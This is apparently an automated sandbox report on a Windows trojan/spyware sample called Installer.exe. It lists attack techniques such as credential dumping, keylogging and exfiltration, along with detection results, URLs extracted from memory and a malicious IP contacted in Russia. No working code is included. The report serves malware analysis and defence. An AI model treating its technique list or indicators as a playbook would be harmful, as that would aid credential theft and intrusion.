                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
                      Obfuscated Files or Information                      		LSA Secrets124
                      System Information Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Software Packing                      		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      DLL Side-Loading                      		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Installer.exe39%VirustotalBrowse
                      Installer.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.3.Installer.exe.1430000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                      2.2.AppLaunch.exe.41c0000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                      0.2.Installer.exe.13d4614.1.unpack100%AviraTR/ATRAPS.Gen5Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://tempuri.org/Entity/Id19Responseon100%URL Reputationphishing
                      http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                      http://tempuri.org/0%URL Reputationsafe
                      http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                      http://ns.adobe.c/g0%URL Reputationsafe
                      http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id90%URL Reputationsafe
                      http://tempuri.org/Entity/Id80%URL Reputationsafe
                      http://tempuri.org/Entity/Id50%URL Reputationsafe
                      http://tempuri.org/Entity/Id70%URL Reputationsafe
                      http://tempuri.org/Entity/Id60%URL Reputationsafe
                      http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id200%URL Reputationsafe
                      http://tempuri.org/Entity/Id210%URL Reputationsafe
                      http://tempuri.org/Entity/Id220%URL Reputationsafe
                      http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id100%URL Reputationsafe
                      http://tempuri.org/Entity/Id110%URL Reputationsafe
                      http://tempuri.org/Entity/Id120%URL Reputationsafe
                      http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id130%URL Reputationsafe
                      http://tempuri.org/Entity/Id140%URL Reputationsafe
                      http://tempuri.org/Entity/Id150%URL Reputationsafe
                      http://tempuri.org/Entity/Id160%URL Reputationsafe
                      http://tempuri.org/Entity/Id170%URL Reputationsafe
                      http://tempuri.org/Entity/Id180%URL Reputationsafe
                      http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id190%URL Reputationsafe
                      http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                      http://tempuri.org/Entity/Id17Response0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/02/sc/sctAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultPAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/chrome_newtabAppLaunch.exe, 00000002.00000002.373473272.00000000069DA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000068C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://tempuri.org/Entity/Id19ResponseonAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: phishing
                                    		unknown
                                    http://tempuri.org/Entity/Id12ResponseAppLaunch.exe, 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/Entity/Id2ResponseAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://ns.adobe.c/gAppLaunch.exe, 00000002.00000003.370355641.000000000492D000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000003.365745204.000000000492C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id21ResponseAppLaunch.exe, 00000002.00000002.373473272.00000000069E7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/Entity/Id9AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id8AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/Entity/Id5AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id7AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id6AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/Entity/Id19ResponseAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsatAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Entity/Id15ResponseAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id6ResponseAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.ip.sb/ipInstaller.exe, 00000000.00000003.304751719.0000000001432000.00000040.00001000.00020000.00000000.sdmp, Installer.exe, 00000000.00000002.306753398.00000000013D5000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.370528626.00000000041C2000.00000020.00000400.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2004/04/scAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id9ResponseAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Entity/Id20AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://tempuri.org/Entity/Id21AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://tempuri.org/Entity/Id22AppLaunch.exe, 00000002.00000002.373473272.00000000066DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://tempuri.org/Entity/Id1ResponseAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=AppLaunch.exe, 00000002.00000002.373473272.00000000069DA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000068C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressingAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trustAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://tempuri.org/Entity/Id10AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://tempuri.org/Entity/Id11AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://tempuri.org/Entity/Id12AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://tempuri.org/Entity/Id16ResponseAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://tempuri.org/Entity/Id13AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://tempuri.org/Entity/Id14AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://tempuri.org/Entity/Id15AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://tempuri.org/Entity/Id16AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/NonceAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Entity/Id17AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id18AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id5ResponseAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://tempuri.org/Entity/Id19AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://tempuri.org/Entity/Id10ResponseAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RenewAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://tempuri.org/Entity/Id8ResponseAppLaunch.exe, 00000002.00000002.373473272.00000000069E7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2006/02/addressingidentityAppLaunch.exe, 00000002.00000002.373473272.00000000066DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/soap/envelope/AppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://search.yahoo.com?fr=crmas_sfpfAppLaunch.exe, 00000002.00000002.373473272.00000000069DA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000068C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.381215531.0000000007684000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.000000000694E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trustAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/06/addressingexAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoorAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewAppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://tempuri.org/Entity/Id17ResponseAppLaunch.exe, 00000002.00000002.373473272.0000000006651000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510AppLaunch.exe, 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high

                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public IPs

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        82.115.223.46
                                                                                                                                                        		unknownRussian Federation
                                                                                                                                                        		209821MIDNET-ASTK-TelecomRUtrue

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                        Analysis ID:791291
                                                                                                                                                        Start date and time:2023-01-25 09:36:08 +01:00
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 5m 41s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:full
                                                                                                                                                        Sample file name:Installer.exe
                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                        Number of analysed new started processes analysed:3
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@4/1@0/1
                                                                                                                                                        EGA Information:
                                                                                                                                                        • Successful, ratio: 50%
                                                                                                                                                        HDC Information:
                                                                                                                                                        • Successful, ratio: 64.5% (good quality ratio 41.1%)
                                                                                                                                                        • Quality average: 52.7%
                                                                                                                                                        • Quality standard deviation: 43.9%
